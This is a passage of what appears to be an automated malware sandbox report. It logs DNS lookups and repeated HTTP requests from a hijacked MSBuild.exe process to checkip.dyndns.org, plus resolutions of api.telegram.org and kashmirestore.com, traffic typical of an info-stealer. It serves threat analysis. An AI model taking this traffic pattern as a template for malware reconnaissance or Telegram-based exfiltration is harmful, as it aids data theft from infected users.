                                                                                                                            Dec 14, 2024 13:49:45.989290953 CET1.1.1.1192.168.2.60xb400No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:06.920958042 CET1.1.1.1192.168.2.60x179bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:06.920958042 CET1.1.1.1192.168.2.60x179bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:06.920958042 CET1.1.1.1192.168.2.60x179bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:06.920958042 CET1.1.1.1192.168.2.60x179bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:06.920958042 CET1.1.1.1192.168.2.60x179bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:06.920958042 CET1.1.1.1192.168.2.60x179bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:10.953824997 CET1.1.1.1192.168.2.60x837aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:18.946362972 CET1.1.1.1192.168.2.60x87f1No error (0)kashmirestore.com119.18.54.39A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • reallyfreegeoip.org
                                                                                                                            • api.telegram.org
                                                                                                                            • checkip.dyndns.org

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.649719158.101.44.242807252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:36.361257076 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:37.567213058 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:37 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 43db8d738f85099c11fec4e2458b9065
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 14, 2024 13:49:37.580169916 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:37.955250025 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:37 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: f8be8b6efacb699b65355ac5b401d17f
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 14, 2024 13:49:40.240894079 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:40.614959002 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:40 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 91d195408e7ae871bfebc16f073d4772
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.649724193.122.6.168807252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:42.558427095 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:44.061372995 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6aac2b039c1129c97eb60100502e63fe
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 14, 2024 13:49:44.206047058 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6aac2b039c1129c97eb60100502e63fe
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.649728193.122.6.168807252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:45.855396032 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:47.121812105 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:46 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: c9e1a81dc6895e7301d78cb8daf10ac4
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.649731193.122.6.168807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:47.938636065 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:49.209090948 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:49 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: ea33582956fe39a8962f3b4afb72ff3e
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 14, 2024 13:49:49.212517023 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:49.619646072 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:49 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: d6a9455bd1f2d41059462e2dacc999b3
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 14, 2024 13:49:51.326878071 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:51.734481096 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:51 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 4152cb77e6e2783429c5c4ae319ebf74
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.649733193.122.6.168807252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:48.932734013 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:50.199438095 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:50 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: ef77f7d22b53accff2f961fd970c8e1b
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.649737193.122.6.168807252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:51.993699074 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:53.282005072 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:53 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: b635cd16f99c5362010150a8c318bca6
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.649740193.122.6.168807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:53.534574986 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:54.991236925 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:54 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 72adf531cb404e9395e443c2e063b127
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.649741193.122.6.168807252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:55.082681894 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:56.351850033 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:56 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 26c21a1d4fe88fb8f0c2d88305b546b5
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.649744193.122.6.168807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:56.811084032 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:58.328589916 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:58 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 8988aa3926c02327362e75059d6c8c91
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.649746193.122.6.168807252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:49:58.234639883 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:59.510355949 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:59 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: e35402f92ed500e0559479913cc60d45
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.649749193.122.6.168807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:50:00.122747898 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:50:05.112823009 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:04 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6ac4e8d7e901e636a5d3e335cb3153c5
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.649750193.122.6.168807252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:50:01.299500942 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:50:09.118654966 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:08 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 581cf8521b9cc737d84ff20024147f43
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.649753132.226.247.73807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:50:07.045927048 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:50:17.287951946 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:17 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 3006336f35ffbf79b9f5d7ab00479c2e
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.649759132.226.247.73807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 14, 2024 13:50:19.089621067 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:50:22.347810984 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:22 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 7d5d263a8b663d8a5f74a6fc8425581a
